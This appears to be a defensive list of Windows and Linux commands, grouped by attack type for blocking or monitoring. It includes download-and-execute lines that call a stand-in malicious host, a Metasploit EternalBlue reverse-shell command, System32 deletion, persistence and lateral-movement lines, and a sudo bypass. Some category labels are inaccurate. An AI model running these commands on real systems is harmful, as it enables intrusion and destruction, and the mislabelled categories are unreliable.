#PowerShell commands that download or execute files from external sources, such as:

Invoke-WebRequest
Invoke-Shellcode
Invoke-Expression

#Commands that enable remote access or control, such as:

netsh advfirewall firewall remoteadmin enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start "Remote Desktop Services"

#Commands that disable or bypass security controls, such as:

setx /m PATH "%PATH%;C:\Malware"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

#Commands that perform credential harvesting or stealing, such as:

mimikatz
net user administrator *

#Commands that exfiltrate data, such as:

certutil -encode data.txt encoded_data.txt
ftp -s:upload.txt

#Commands that create or modify user accounts or groups, such as:

net user /add
net localgroup administrators /add

#Commands that modify or delete system files, such as:

del /f /s /q C:\Windows\System32\*
sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows


#Commands that install or modify software or services, such as:

msiexec /i malicious_installer.msi /qn
sc create malicious_service binpath="C:\Malware\malicious_service.exe"

#Commands that enable or disable Windows features or components, such as:

dism /online /disable-feature /featurename:TelnetServer
dism /online /enable-feature /featurename:NetFx3 /all /source:D:\sources\sxs /limitaccess

#Commands that initiate network scanning or port scanning, such as:

nmap -sS -p 1-65535 10.10.10.10
ping -n 1 -w 500 10.10.10.10

#Commands that modify system settings or configurations, such as:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v Debugger /t REG_SZ /d "C:\Malware\malicious_debugger.exe" /f
netsh advfirewall firewall add rule name="MaliciousRule" dir=in action=block protocol=TCP localport=443

#Commands that execute scripts or macros, such as:

cscript.exe //B C:\Malware\malicious_script.vbs
powershell.exe -ExecutionPolicy Bypass -File C:\Malware\malicious_script.ps1

#Commands that establish or terminate network connections, such as:

netstat -ano
taskkill /pid <process_id> /f

#Commands that enumerate or dump system information, such as:

systeminfo
wmic bios get serialnumber

#Commands that modify or delete registry keys or values, such as:

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v MaliciousProgram /t REG_SZ /d "C:\Malware\malicious_program.exe"

#Commands that execute or schedule tasks, such as:

schtasks /create /tn "MaliciousTask" /tr C:\Malware\malicious_task.exe /sc ONCE /st 10:00
at 12:00 /every:monday,tuesday,wednesday,thursday,friday C:\Malware\malicious_task.exe

#Commands that encrypt or decrypt files or data, such as:

openssl enc -aes-256-cbc -in file.txt -out file.enc -k secret_password
certutil -decode encoded_data.txt decoded_data.txt

#Commands that execute or interact with browser-based applications, such as:

chromium-browser --disable-web-security --user-data-dir=/tmp/malicious_profile http://malicious_website.com
firefox -no-remote -P malicious_profile -url http://malicious_website.com

#Commands that modify or abuse Active Directory settings, such as:

net user /domain /add
dsadd user "CN=MaliciousUser,CN=Users,DC=domain,DC=com" -pwd Pass1234 -mustchpwd yes

#Commands that perform memory-based attacks, such as:

meterpreter > ps
meterpreter > migrate <process_id>

##Top 10 examples of malicious commands that could be used in attacks and should be blocked or monitored in an organization (note that several of the examples listed here, such as systeminfo, netstat, tasklist, ping and sfc, are also routine administrative commands, so they are better suited to contextual monitoring and alerting than to outright blocking):

#Commands that download and execute malicious code, such as:

curl http://malicious_website.com/malware.exe -o C:\Malware\malware.exe && C:\Malware\malware.exe
wget http://malicious_website.com/malware.exe -O C:\Malware\malware.exe && C:\Malware\malware.exe

#Commands that create or modify user accounts, such as:

net user /add
net localgroup administrators /add malicious_user

#Commands that modify file permissions or ownership, such as:

icacls C:\Windows\System32\malicious.dll /grant everyone:(F)
takeown /f C:\Windows\System32\malicious.dll && icacls C:\Windows\System32\malicious.dll /grant everyone:(F)

#Commands that launch or terminate processes, such as:

tasklist /svc
taskkill /im malicious_process.exe /f

#Commands that perform lateral movement, such as:

net use \\target_computer\IPC$ /user:username password
psexec.exe \\target_computer -u username -p password -accepteula -c C:\Malware\malicious_program.exe

#Commands that leverage PowerShell to execute malicious code, such as:

powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://malicious_website.com/malware.ps1')"

#Commands that manipulate or exfiltrate data, such as:

echo "sensitive_data" >> C:\Malware\exfiltrated_data.txt
certutil -urlcache -f http://malicious_website.com/exfiltrated_data.txt C:\Malware\exfiltrated_data.txt

#Commands that exploit or abuse system vulnerabilities, such as:

msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST <target_ip>; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <attacker_ip>; exploit"
nmap -sS -sV -O --script vuln <target_ip>

#Commands that inject or load malicious code into memory, such as:

rundll32.exe malicious.dll,DllRegisterServer
sc create MaliciousService binPath= "C:\Malware\malicious_service.exe" start= auto

#Commands that perform privilege escalation, such as:

runas /user:administrator C:\Malware\malicious_program.exe
sudo -u#-1 /bin/bash

Here's a complete list of the tags associated with privilege escalation that we have discussed so far:

sudo
sudoers
sudo hijacking
exploit
msfconsole
adenum
pass the hash
pass the ticket
mimikatz
netsh
runas
setuid
setgid
file permissions
DLL hijacking
cron jobs
user impersonation
kernel exploits
group policy
registry
DLL injection
Scheduled Tasks
Privilege Escalation Scripts
exploit-db
PowerShell
su





